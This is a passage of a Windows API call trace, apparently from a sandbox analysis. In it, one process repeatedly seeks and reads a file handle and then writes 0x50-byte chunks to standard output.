dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.313] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.314] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.314] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.315] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.315] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.316] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.316] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.318] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.318] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.319] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.319] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.320] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.320] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.321] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.321] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, 